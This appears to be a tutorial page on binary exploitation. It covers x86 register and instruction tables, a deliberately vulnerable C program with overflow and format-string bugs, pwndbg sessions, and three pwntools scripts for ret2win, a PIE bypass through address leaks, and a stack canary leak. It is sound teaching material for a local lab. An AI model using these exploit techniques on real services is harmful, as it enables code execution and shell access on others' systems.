Binary Exploitation
Assembly Overview#
Assembly language is a low-level programming language that translates high-level code into machine instructions. Registers temporarily hold data and facilitate operations.
Core Registers
| Reg | 32b | 64b | Usage |
|---|---|---|---|
| Math | EAX | RAX | Return, Math |
| Base | EBX | RBX | Memory Base |
| Count | ECX | RCX | Loops, 4th Arg |
| Data | EDX | RDX | I/O, 3rd Arg |
| Index | ESI/EDI | RSI/RDI | 1st/2nd Arg |
| Stack | ESP/EBP | RSP/RBP | Stack/Frame Ptr |
| Extra | - | R8-R15 | 5th+ Args |
Register Sizes
| 64b | 32b | 16b | 8b |
|---|---|---|---|
| RAX-RDX | EAX-EDX | AX-DX | AL-DL |
| RSP/RBP | ESP/EBP | SP/BP | SPL/BPL |
| RSI/RDI | ESI/EDI | SI/DI | SIL/DIL |
| R8-R15 | R8D-R15D | R8W-R15W | R8B-R15B |
Memory & Types
| Type | 32b | 64b |
|---|---|---|
| Word | 2B | 2B |
| DWord | 4B | 4B |
| QWord | - | 8B |
| Ptr | 4B | 8B |
| Addr | 4GB | 16EB |
Instructions
| Type | Mnemonic | Opcode | Effect |
|---|---|---|---|
| Data | mov,lea | 0x89,8D | Transfer |
| Math | add,sub | 0x01,29 | Arithmetic |
| Flow | jmp,call | 0xEB,E8 | Control |
| Stack | push,pop | 0x50+r | Stack ops |
| Logic | and,or,xor | 0x21,09,31 | Bitwise |
| Test | cmp,test | 0x39,85 | Compare |
Conditionals
| Jump | Op | Flags | Test |
|---|---|---|---|
| je/jz | 74 | ZF=1 | Equal |
| jne | 75 | ZF=0 | Not Equal |
| jg | 7F | SF=OF,ZF=0 | Greater |
| jl | 7C | SF≠OF | Less |
| jge | 7D | SF=OF | Greater/Equal |
| jle | 7E | ZF=1∨SF≠OF | Less/Equal |
Status Flags
| Bit | Flag | Use |
|---|---|---|
| 0 | CF | Carry |
| 6 | ZF | Zero |
| 7 | SF | Sign |
| 11 | OF | Overflow |
| 2 | PF | Parity |
| 4 | AF | Adjust |
| 10 | DF | Direction |
| 9 | IF | Interrupt |
Dereferencing
| Command | Explanation | Example Use Case |
|---|---|---|
mov rbx, [rax] | Read memory at address in rax into rbx | Reading a variable value |
mov [rax], 10 | Write value 10 to memory at address in rax | Storing immediate value |
lea rbx, [rax] | Load effective address of rax into rbx | Getting pointer address |
Properties
| Feature | Value | Impact |
|---|---|---|
| Format | ELF | Linux executable |
| Architecture | 64-bit LSB | x86_64 little-endian |
| RELRO | Partial | Some segments read-only |
| STACK CANARY | None | No stack overflow detection |
| NX | Enabled | Memory regions not executable |
| PIE | Enabled | Random program loading |
| RPATH/RUNPATH | None | Standard library paths |
| Symbols | 67 | Debug symbols available |
| FORTIFY | No | No runtime checks |
| Linking | Dynamic | Uses shared libraries |
| Interpreter | /lib64/ld-linux-x86-64.so.2 | Dynamic linker |
| Debug Info | Not stripped | Has symbol table |
| BuildID | Present | Debug info identifier |
Resources#
Learning
Challenges
Vulnerable Example#
vuln.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void win() { system("/bin/sh"); }
void vuln() {
char buf[32];
printf("> "); scanf("%s", buf);
printf(buf); printf("\n");
return;
}
int main() {
setvbuf(stdout, NULL, _IONBF, 0);
while(1) { vuln(); }
return 0;
}
Let’s start simple with all protections disabled and 32bit for shorter addresses
gcc vuln.c -o vuln -m32 -no-pie -fno-stack-protector
❯ gdb vuln
pwndbg> cyclic 100
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
pwndbg> r
Starting program: /home/e/vuln
> aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa
Program received signal SIGSEGV, Segmentation fault.
Invalid address 0x6161616c
pwndbg> cyclic -l 0x6161616c
Finding cyclic pattern of 4 bytes: b'laaa' (hex: 0x6c616161)
Found at offset 44
Note: If we switch to a 64-bit architecture, the offset changes. However if you change with correct addreses it work.
gcc vuln.c -o vuln -no-pie -fno-stack-protector
❯ gdb vuln
pwndbg> cyclic 100
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa
pwndbg> r
Starting program: /home/e/vuln
> aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaa
Program received signal SIGSEGV, Segmentation fault.
─────────────[ DISASM / x86-64 / set emulate on ]──────────────
► 0x4011ca <vuln+94> ret <0x6161616161616166>
↓
pwndbg> cyclic -l 0x6161616161616166
Finding cyclic pattern of 8 bytes: b'faaaaaaa' (hex: 0x6661616161616161)
Found at offset 40
❯ ropper --file ./vuln --search "ret"
0x000000000040101a: ret;
So now instead of 44 is 40 and we have also stack allignment issues so now we use a ret gadget
Thanks to the formatstring vuln we can leak informations this will come handy later with less protections
#!/usr/bin/env python3
from pwn import *
exe = './vuln'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
context.terminal = ["tmux", "splitw", "-h"]
def fsleak(num=40):
leaks = {}
log.info("Leaking stack values:")
offsets = list(range(0, num))
for offset in offsets:
try:
io.recvuntil(b'>')
io.sendline(f'%{offset}$p'.encode())
leak = io.recvline().strip()
if leak.startswith(b'0x') and leak != b'(nil)':
addr = int(leak, 16)
leaks[offset] = addr
log.info(f"Offset {offset}: {leak.decode()}")
except Exception:
pass
return leaks
def ret2win():
if elf.elfclass == 64:
payload = b'\x90'*40 + pack(0x40101a) + pack(elf.symbols['win'])
else:
payload = b'\x90'*44 + pack(elf.symbols['win'])
log.info("Payload (hex): " + payload.hex())
gdb.attach(io, gdbscript="c")
return payload
def main():
global io
io = process([exe], env={'LD_PRELOAD': ''})
fsleak(10)
io.sendlineafter(b'> ', ret2win())
io.interactive()
if __name__ == '__main__':
main()
gcc vuln.c -o vuln -fno-stack-protector
Removing nopie or enabling ASLR breaks the position-independent code, causing the base address to become random. As a result, all function offsets change, and the program no longer behaves as expected. You can verify this by running ldd vuln the addresses will change upon rerun. While you can disable ASLR on your local machine, it cannot be disabled for programs hosted on other machines, such as in CTFs.
Now we play with the format string vulnerability to leak the correct address
if we leak fsleak() and in the gdb pane do x <address> we start loking at what we are leaking
pwndbg> info address main
Symbol "main" is at 0x11e4 in a file compiled without debugging.
We look for 0x11e4 since is the Offset 17 0x11e4 leaked from the fstring vuln
pwndbg> x 0x6403f709d1e4
0x6403f709d1e4 <main>: 0xe5894855
pwndbg> info proc mappings
Mapped address spaces:
Start Addr End Addr Size Offset Perms objfile
0x6403f709c000 0x6403f709d000 0x1000 0x0 r--p /home/e/vuln
0x6403f709d000 0x6403f709e000 0x1000 0x1000 r-xp /home/e/vuln
❯ nm -n vuln | grep " main"
00000000000011e4 T main
By leaking and obtaining the 17th element, ‘main’, we can subtract 0x11e4 to calculate the base address.
#!/usr/bin/env python3
from pwn import *
exe = './vuln'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
def fsleak(num=40):
leaks = {}
log.info("Leaking stack values:")
offsets = list(range(0, num))
for offset in offsets:
try:
io.recvuntil(b'>')
io.sendline(f'%{offset}$p'.encode())
leak = io.recvline().strip()
if leak.startswith(b'0x') and leak != b'(nil)':
addr = int(leak, 16)
leaks[offset] = addr
log.info(f"Offset {offset}: {leak.decode()}")
except Exception:
pass
return leaks
if __name__ == '__main__':
io = process(exe)
#fsleak()
io.recvuntil(b'> ')
if elf.elfclass == 64:
io.sendline(b'%17$p')
else:
io.sendline(b'%29$p')
main_leak = int(io.recvline().strip(), 16)
if elf.elfclass == 64:
elf.address = main_leak - 0x11e4
else:
elf.address = main_leak - 0x1244
log.info(f"Base address: {hex(elf.address)}")
log.info(f"Win function address: {hex(elf.symbols.win)}")
ret_gadget = elf.address + 0x101a
if elf.elfclass == 64:
payload = b'\x90'*40 + p64(ret_gadget) + p64(elf.symbols.win)
else:
payload = b'\x90'*44 + p64(elf.symbols.win)
gdb.attach(io, gdbscript="c")
io.sendlineafter(b'> ', payload)
io.interactive()
gcc vuln.c -o vuln -no-pie && python poc
Removing -fno-stack-protector add canaries.
Now buffer overflows cause
*** stack smashing detected ***: terminated
So we need to leak the canaries thanks to formatstring
#!/usr/bin/env python3
from pwn import *
exe = './vuln'
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
context.terminal = ["tmux", "splitw", "-h"]
def fsleak(num=40):
leaks = {}
log.info("Leaking stack values:")
offsets = list(range(0, num))
for offset in offsets:
try:
io.recvuntil(b'>')
io.sendline(f'%{offset}$p'.encode())
leak = io.recvline().strip()
if leak.startswith(b'0x') and leak != b'(nil)':
addr = int(leak, 16)
leaks[offset] = addr
log.info(f"Offset {offset}: {leak.decode()}")
except Exception:
pass
return leaks
def find_canaries(io, start=1, end=40):
log.info("Searching for canary pattern on stack...")
found = []
for i in range(start, end):
try:
io.recvuntil(b'>')
io.sendline(f'%{i}$p'.encode())
leak = io.recvline().strip()
if leak.startswith(b'0x'):
value = int(leak, 16)
if value & 0xff == 0:
if elf.elfclass == 32 and hex(value).endswith("00"):
log.info(f"Potential canary at offset {i}: {hex(value)}")
found.append((i, value))
except:
continue
return found
def build_payload(canary):
win_addr = 0x401176
ret_addr = 0x40101a
payload = (b'\x90' * 40 + pack(canary) + pack(0) + pack(ret_addr) + pack(win_addr))
return payload
def main():
global io
try:
io = process(exe)
fsleak()
canaries = find_canaries(io)
if not canaries:
log.failure("No potential canaries found!")
return
io.close()
io = process(exe)
gdb.attach(io, """
canary --all
c
""")
canary_offset = 11
io.recvuntil(b'>')
io.sendline(f'%{canary_offset}$p'.encode())
canary = int(io.recvline().strip(), 16)
payload = build_payload(canary)
io.sendlineafter(b'>', payload)
io.interactive()
except Exception as e:
log.failure(f"Exploit failed: {str(e)}")
if io:
io.close()
if __name__ == '__main__':
main()